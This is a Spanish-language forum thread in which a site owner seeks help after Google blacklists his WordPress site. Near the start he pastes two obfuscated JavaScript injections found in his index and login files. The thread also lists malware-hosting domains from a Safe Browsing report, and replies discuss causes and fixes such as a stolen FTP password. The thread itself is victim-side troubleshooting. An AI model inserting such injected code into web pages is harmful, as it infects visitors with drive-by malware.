Buenas,

Hoy he recibido un email de parte de Google diciéndome que mi web contenía software malicioso y me la bloqueaban.

Me he quedado un poco loco, pues no alojo nada raro, así que me he puesto a investigar y ha aparecido código javascript muy raro en todos mis archivos index.* o login.*

El código en cuestión es:


<script>var a='';var b='%22ai2%%32d%imDAohd%h2b233e%/mpt2t2o2CEirt-e2%h2r%%aCstcd%D0%fr2r30hbn232D0e2fr%%..w2i5mDEe%2//%h2%%r0/ fcpgx02e2a33ma33cpi5g%e%%%';var c='0543869127';for(var i=0;i<13;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*13)+i);document .writeln(unescape(a));</script>
<script>var a='';var b='%22d6rSmddri5g%e%%%r%%gf./p8t232D0e2f %2/5dOai6tw2i5mDEe a33rgJi%4%%D0%fr2r 30hg4t.e%iud%h2b233mDAfhef3%32%h2r%%a irtf5ropDe%h2%%r0/ Csthrtc.3ret2t2o2CEfcpdtemh6c2%%32d%i e%/gxtrF2D02e2a33m ';var c='0476813592';for(var i=0;i<19;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*19)+i);document .writeln(unescape(a));</script>

Es evidente que alguien o algo ha inyectado ese código ahí, pero en teoría no debería ser posible a menos que supieran mi usuario y contraseña de FTP, ¿no?

¿Sabéis de algún otro modo en que pudieran habérmela colado? :S

Muchas gracias

para estar ahi es porque han toqueteao el fichero en el server eso esta claro. Mirate antes de todo quien te da hosting y preguntale por los accesos, en el mio el tio que me hace el hosting se pasea por alli cuando le da la gana, habra otros como el...

para estar ahi es porque han toqueteao el fichero en el server eso esta claro. Mirate antes de todo quien te da hosting y preguntale por los accesos, en el mio el tio que me hace el hosting se pasea por alli cuando le da la gana, habra otros como el...

Es un sitio serio, no se va a meter un currito de allí a cambiar webs...

Lamentablemente es algo "común". Usas wordpress verdad? Lo tenías actualizado a la última versión? porque habrán usado alguna vulnerabilidad del mismo para cambiar tu archivo index o lo que sea (no hace falta tener usuario de FTP para hacerlo si están explotando algún bug)

puck a mi me pasó no hace tanto con mi blog también

Lo que hice fue actualizar todo a la última versión y desactivar y eliminar todos los plugins que no usaba... porque me vino a través de ahí :)

Saludos!

EDITO: También tengo Wordpress...

Otra cosa a mirar es que no tengas ningún otro usuario creado y tal... por si te sirve de ayuda te paso el enlace de lo que me pasó a mi

http://www.gp32spain.com/foros/showthread.php?s=&threadid=88616

serio como la vida misma... si supieras lo serio que son en las empresas de seguridad...

serio como la vida misma... si supieras lo serio que son en las empresas de seguridad...

Tampoco hace falta fumar colacao, como ves es algo común. Seguramente sea algun hacker-wannabe aprovechando una vulnerabilidad de wordpress...

Lamentablemente es algo "común". Usas wordpress verdad? Lo tenías actualizado a la última versión? porque habrán usado alguna vulnerabilidad del mismo para cambiar tu archivo index o lo que sea (no hace falta tener usuario de FTP para hacerlo si están explotando algún bug)

Sí, tengo un wordpress relativamente viejecillo... Supongo que habrán usado algún bug, pero lo que me extraña es que me han hackeado los archivos de los dos wordpress que tengo montados en la misma ruta, pero además del bugtracker (mantis) e incluso un index.html

Tendré que actualizar los wordpress, pero me da una pereza por las típicas incompatibilidades con temas y demás una vez instalado...

Sí, tengo un wordpress relativamente viejecillo... Supongo que habrán usado algún bug, pero lo que me extraña es que me han hackeado los archivos de los dos wordpress que tengo montados en la misma ruta, pero además del bugtracker (mantis) e incluso un index.html

Tendré que actualizar los wordpress, pero me da una pereza por las típicas incompatibilidades con temas y demás una vez instalado...

Ya, pero esque si no actualizas mira lo que pasa ;)

puck a mi me pasó no hace tanto con mi blog también

Lo que hice fue actualizar todo a la última versión y desactivar y eliminar todos los plugins que no usaba... porque me vino a través de ahí :)

Saludos!

EDITO: También tengo Wordpress...

Otra cosa a mirar es que no tengas ningún otro usuario creado y tal... por si te sirve de ayuda te paso el enlace de lo que me pasó a mi

http://www.gp32spain.com/foros/showthread.php?s=&threadid=88616

No, solo tengo mi usuario...

Ya me he empollado tu hilo y a mi también me salta la advertencia de Google hacia el gotovikrabote.bee.pl...

¿Cuánto tardó Google en volver a revisarte la página desde que lo pediste y quitarte de la lista negra?

A mi Google no me quería ni dejar entrar en este hilo, ¿Es normal? Suerte con ello Puck

No, solo tengo mi usuario...

Ya me he empollado tu hilo y a mi también me salta la advertencia de Google hacia el gotovikrabote.bee.pl...

¿Cuánto tardó Google en volver a revisarte la página desde que lo pediste y quitarte de la lista negra?

Nada un par de horas, antes entré en tuweb y no me salió ningún aviso :)

Navegación segura
Página de diagnóstico de retrowip.com

¿Cuál es la clasificación actual de retrowip.com?
El sitio está clasificado como sospechoso; visitar este sitio web puede dañar su equipo.

Parte de este sitio ha recibido la clasificación de actividad sospechosa 25 veces en los últimos 90 días.

¿Qué sucedió cuando Google visitó este sitio?
De las 144 páginas que hemos comprobado en el sitio durante los últimos 90 días, 53 páginas han provocado la descarga e instalación de software malicioso sin el consentimiento del usuario. La última vez que Google visitó el sitio fue el 2012-03-01 y la última vez que se encontró contenido sospechoso en él fue el 2012-03-01.
El software malicioso incluye 60 trojan(s), 59 exploit(s). La infección ha provocado una media de 1 procesos nuevos en el equipo atacado.

El software malicioso está alojado en 4 dominios, incluidos europez.biz/, abc-g.com/, 178.162.149.0/

Parece que 3 dominios funcionan como intermediarios en la distribución de software malicioso a los visitantes de este, incluidos abc-g.com/, miporoskilosi.bee.pl/, dghfdgrfg564r5tfghxdrttre.jetos.com/.

El sitio estaba alojado en 1 redes, incluidas AS8560 (SCHLUND).

¿Este sitio ha actuado de intermediario en la distribución de software malicioso?
Parece que en los últimos 90 días, retrowip.com no ha funcionado como intermediario en la infección de ningún sitio.

¿Este sitio ha alojado software malicioso?
No, este sitio no ha alojado software malicioso en los últimos 90 días.

¿Cómo ha sucedido esto?
En algunos casos, otras personas pueden añadir código malicioso a sitios legítimos, lo que podría provocar que mostrásemos el mensaje de advertencia.

Pasos siguientes:
Volver a la página anterior.
Si es el propietario de este sitio web, puede solicitar su revisión con Herramientas para webmasters de Google. En el Centro de asistencia para webmasters de Google se ofrece más información acerca del proceso de revisión.

Tampoco hace falta fumar colacao, como ves es algo común. Seguramente sea algun hacker-wannabe aprovechando una vulnerabilidad de wordpress...

O una vulnerabilidad de MySQL, o de Apache.

O una vulnerabilidad de MySQL, o de Apache.

Sí, pero usando WP... lo normal es que te entre por ahí si no lo tienes actualizado ;)

Sí, pero usando WP... lo normal es que te entre por ahí si no lo tienes actualizado ;)

Pues al final me entraban por el FTP... No tenía una contraseña demasiado complicada, pero tampoco aparecía en diccionarios ni nada parecido, sin embargo según vi en el log mi FTP parecía el **** de la Bernarda, con accesos de EEUU, Alemania y Rusia... :loco:

Lo curioso es que se siga accediendo a ordenadores por FTP.

En FTP, la contraseña se envía sin cifrar por la red. Cualquiera puede escucharla. Ni se te ocurra utilizar una contraseña que uses en cualquier otro sitio. De hecho, te diría que ni se te ocurra volver a usar FTP. Seguro que hay otros modos de subir archivos a tu servidor.

Lo curioso es que se siga accediendo a ordenadores por FTP.

En FTP, la contraseña se envía sin cifrar por la red. Cualquiera puede escucharla. Ni se te ocurra utilizar una contraseña que uses en cualquier otro sitio. De hecho, te diría que ni se te ocurra volver a usar FTP. Seguro que hay otros modos de subir archivos a tu servidor.

La alternativa es hacerlo a través de un gestor web... así que dentro de lo malo es lo mejor...